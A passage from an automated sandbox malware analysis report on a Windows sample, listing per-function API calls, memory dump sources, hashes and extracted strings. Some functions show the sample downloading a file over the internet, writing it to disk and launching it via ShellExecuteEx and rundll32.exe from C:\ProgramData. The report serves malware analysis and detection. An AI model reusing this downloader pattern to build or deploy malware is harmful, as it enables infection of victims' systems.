                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404100: InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                      • ShellExecuteEx.SHELL32(?), ref: 00412374
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Internetlstrcpy$CloseFileHandle$Openlstrcatlstrlen$CreateExecuteReadShellSystemTimeWritememset
                                                                                                                                                                                                                                                                                      • String ID: "" $.dll$<$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                      • API String ID: 1030512983-3594953769
                                                                                                                                                                                                                                                                                      • Opcode ID: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                      • Instruction ID: 94f81c9545e4cc3746d51ce8cbcf5f5300d4dbcdb4f20de0f2bf9a4aeae790fb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71bf46b4cf027e80f578f73df63c51bd86913535bd7139d30bb799e6920a5dfd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87815170A0021857DB14FBB2CDEAAEF7B69AF44748F40145EB4066B182DEBC5DC5C7A8
                                                                                                                                                                                                                                                                                      Function 0041D590 Relevance: 9.1, APIs: 6, Instructions: 118timeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041D5E3
                                                                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041D611
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?), ref: 0041D647
                                                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0041D653
                                                                                                                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041D66F
                                                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D6D8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Time$File$PointerSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3240274019-0
                                                                                                                                                                                                                                                                                      • Opcode ID: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                      • Instruction ID: 199ab82a49c152330d2498684869e6748a8235d6c4fc3d2a3f6766ec5b303acd
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bbcc28ab56e80f32c9f7ab3c82fd0820beba7326b7d26195747d188f513748ab
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8410EB1904705AED324CF25C845B7BBBE8FF84348F108A2EF5D69A291E774E486CB14
                                                                                                                                                                                                                                                                                      Function 00402520 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040257A
                                                                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040258E
                                                                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004025AD
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 004025E7
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,?,00000000,string too long,004024F6,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 00402608
                                                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040260D
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??2@$??3@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmemcpy
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3928403917-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                                      • Instruction ID: 52b5ec612f7533a417f76914090347e108d7196820fc58126e476e1f6b56743e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7e14c953d7065ddfbc83dcc624144d79b7d133a95972969d59e1279a8bc6929
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 152107B26006011BCB24AE7D9E9842FB7E9DF953107150B3FF452D77C1E6B9D884829D
                                                                                                                                                                                                                                                                                      Function 00410920 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38memorytimeCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(?,?,Version: ,0042150A,?,?,?,?,?,?,?,?,?,?,00417920,?), ref: 0041092D
                                                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 0041093B
                                                                                                                                                                                                                                                                                      • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 00410942
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410971
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Heap$AllocLocalProcessTimewsprintf
                                                                                                                                                                                                                                                                                      • String ID: %d/%d/%d %d:%d:%d
                                                                                                                                                                                                                                                                                      • API String ID: 1243822799-1073349071
                                                                                                                                                                                                                                                                                      • Opcode ID: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                      • Instruction ID: a51e7d71a8269122c591f01167c988a4a4a74b4f43d1a07cc1a506d8f3a3d197
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2c1e16d8c03991da878c3dd388cb4621876e2a5b3eb0db676d70254b9559b3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0CF0E9619042207BE300175ADC49D3BB7ECEFC5B66F00450AF9C8861C0E2755C60C3F1
                                                                                                                                                                                                                                                                                      Function 0040F780 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • memchr.MSVCRT ref: 0040F7F6
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F870
                                                                                                                                                                                                                                                                                      • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,FFFFFFFF,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.,00000041,?,?,?,?,?,?,?,00000000), ref: 0040F884
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_., xrefs: 0040F7A8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ??3@_invalid_parameter_noinfo_noreturnmemchrmemmove
                                                                                                                                                                                                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.
                                                                                                                                                                                                                                                                                      • API String ID: 1808541760-3714209346
                                                                                                                                                                                                                                                                                      • Opcode ID: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                      • Instruction ID: e5761b3670b8c8960a25c8c0341e9f71b1cf11a4bb1c116d5b70eba03c88b707
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2e741561981e289a51148b6f99af6e0fc96081143b174a70ad3d1b80647f697e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9931E4326043014BD734EE28998476BB6E5EF81314F54493EF8926B7C2D378DC48879A
                                                                                                                                                                                                                                                                                      Function 00412C40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
